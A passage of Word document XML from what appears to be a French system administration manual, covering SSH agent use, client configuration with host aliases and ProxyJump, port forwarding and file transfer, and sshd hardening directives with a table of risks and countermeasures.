              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>256–521 bits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Correct, moins courant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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DSA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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1024 bits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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À ne plus utiliser</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AGENT SSH</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Programme qui conserve les clés déverrouillées en mémoire pour la session. Il évite de ressaisir la phrase secrète à chaque connexion, sans jamais écrire la clé en clair sur disque.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre commandes d'agent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Démarrer l'agent et y ajouter une clé</w:t>
        <w:br/>
        <w:t>eval "$(ssh-agent -s)"</w:t>
        <w:br/>
        <w:t>ssh-add ~/.ssh/id_ed25519</w:t>
        <w:br/>
        <w:t>ssh-add -l</w:t>
        <w:br/>
        <w:br/>
        <w:t># Durée de vie limitée, utile sur une machine partagée</w:t>
        <w:br/>
        <w:t>ssh-add -t 8h ~/.ssh/id_ed25519</w:t>
        <w:br/>
        <w:br/>
        <w:t># Sur macOS, l'agent est lié au trousseau</w:t>
        <w:br/>
        <w:t>ssh-add --apple-use-keychain ~/.ssh/id_ed25519</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>59.2 Fichier de configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>~/.ssh/config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite de retenir des options par cœur. Il autorise aussi des raccourcis et des configurations par hôte, ce qui rend les scripts lisibles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une configuration lisible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Host *</w:t>
        <w:br/>
        <w:t xml:space="preserve">    AddKeysToAgent yes</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ServerAliveInterval 60</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ServerAliveCountMax 3</w:t>
        <w:br/>
        <w:t xml:space="preserve">    HashKnownHosts yes</w:t>
        <w:br/>
        <w:br/>
        <w:t>Host prod</w:t>
        <w:br/>
        <w:t xml:space="preserve">    HostName 203.0.113.10</w:t>
        <w:br/>
        <w:t xml:space="preserve">    User deploy</w:t>
        <w:br/>
        <w:t xml:space="preserve">    IdentityFile ~/.ssh/id_ed25519_prod</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Port 2222</w:t>
        <w:br/>
        <w:br/>
        <w:t>Host *.interne</w:t>
        <w:br/>
        <w:t xml:space="preserve">    User admin</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ProxyJump bastion</w:t>
        <w:br/>
        <w:br/>
        <w:t>Host bastion</w:t>
        <w:br/>
        <w:t xml:space="preserve">    HostName bastion.exemple.fr</w:t>
        <w:br/>
        <w:t xml:space="preserve">    User jump</w:t>
        <w:br/>
        <w:t xml:space="preserve">    IdentityFile ~/.ssh/id_ed25519</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.209 — Six directives utiles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09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Directive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="281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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HostName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Adresse réelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Alias court</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="281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Éviter </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>user@host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IdentityFile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Clé à utiliser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une clé par environnement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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ProxyJump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Passerelle intermédiaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="281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Réseau cloisonné</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>LocalForward</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tunnel local</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Base non exposée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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ServerAliveInterval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Maintien de session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="281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Connexions instables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre usages de l'alias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Utilisation des alias</w:t>
        <w:br/>
        <w:t>ssh prod</w:t>
        <w:br/>
        <w:t>scp fichier.tar.gz prod:/tmp/</w:t>
        <w:br/>
        <w:t>rsync -avz --progress ./site/ prod:/var/www/site/</w:t>
        <w:br/>
        <w:br/>
        <w:t># Exécuter une commande sans session interactive</w:t>
        <w:br/>
        <w:t>ssh prod "systemctl status nginx --no-pager"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>59.3 Tunnels et transferts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un tunnel SSH transporte un autre protocole dans une connexion chiffrée. C'est un moyen simple d'accéder à un service non exposé, sans ouvrir de port supplémentaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2540000"/>
            <wp:docPr id="71" name="Picture 71"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f69.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.69 — Trois types de transfert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre tunnels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Local : le port 5432 du serveur devient localhost:15432</w:t>
        <w:br/>
        <w:t>ssh -L 15432:localhost:5432 prod</w:t>
        <w:br/>
        <w:br/>
        <w:t># Distant : le port 8080 du serveur renvoie vers le poste local</w:t>
        <w:br/>
        <w:t>ssh -R 8080:localhost:3000 prod</w:t>
        <w:br/>
        <w:br/>
        <w:t># Proxy SOCKS sur le port local 1080</w:t>
        <w:br/>
        <w:t>ssh -D 1080 prod</w:t>
        <w:br/>
        <w:br/>
        <w:t># Dans la configuration, pour ne pas y penser</w:t>
        <w:br/>
        <w:t>Host prod-db</w:t>
        <w:br/>
        <w:t xml:space="preserve">    HostName 203.0.113.10</w:t>
        <w:br/>
        <w:t xml:space="preserve">    User deploy</w:t>
        <w:br/>
        <w:t xml:space="preserve">    LocalForward 15432 localhost:5432</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UN TUNNEL DISTANT OUVRE UNE PORTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-R</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> expose un service local sur la machine distante. Par défaut, il n'écoute que sur </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>localhost</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> distant, ce qui est le comportement sûr. N'utilisez pas </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GatewayPorts yes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sans comprendre la conséquence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois transferts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Transfert de fichiers</w:t>
        <w:br/>
        <w:t>scp -r dossier/ prod:/tmp/</w:t>
        <w:br/>
        <w:t>rsync -avz --delete --exclude ".git" ./site/ prod:/var/www/site/</w:t>
        <w:br/>
        <w:br/>
        <w:t># Mode SFTP interactif</w:t>
        <w:br/>
        <w:t>sftp prod</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PROXYJUMP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Mécanisme qui ouvre une connexion SSH à travers un hôte intermédiaire, sans tunnel manuel. Il remplace l'ancien </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ProxyCommand</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> dans la plupart des cas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>59.4 Durcir le serveur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un serveur SSH exposé subit des tentatives automatisées en permanence. La configuration par défaut est raisonnable, mais quelques directives la renforcent nettement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Onze directives de durcissement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/etc/ssh/sshd_config.d/10-durcissement.conf</w:t>
        <w:br/>
        <w:t>PermitRootLogin no</w:t>
        <w:br/>
        <w:t>PasswordAuthentication no</w:t>
        <w:br/>
        <w:t>KbdInteractiveAuthentication no</w:t>
        <w:br/>
        <w:t>PubkeyAuthentication yes</w:t>
        <w:br/>
        <w:t>AllowUsers deploy admin</w:t>
        <w:br/>
        <w:t>MaxAuthTries 3</w:t>
        <w:br/>
        <w:t>LoginGraceTime 20</w:t>
        <w:br/>
        <w:t>X11Forwarding no</w:t>
        <w:br/>
        <w:t>AllowTcpForwarding no</w:t>
        <w:br/>
        <w:t>ClientAliveInterval 300</w:t>
        <w:br/>
        <w:t>ClientAliveCountMax 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications vitales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Valider avant de recharger, toujours</w:t>
        <w:br/>
        <w:t>sshd -t</w:t>
        <w:br/>
        <w:t>systemctl reload ssh</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier depuis une seconde session avant de fermer la première</w:t>
        <w:br/>
        <w:t>ssh -o BatchMode=yes deploy@serveur true &amp;&amp; echo "accès par clé OK"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.210 — Cinq risques et leurs mesures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46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Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Mesure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Force brute sur mot de passe</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Clés uniquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Supprime le vecteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>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Compromission de root</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PermitRootLogin no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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Traçabilité par compte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
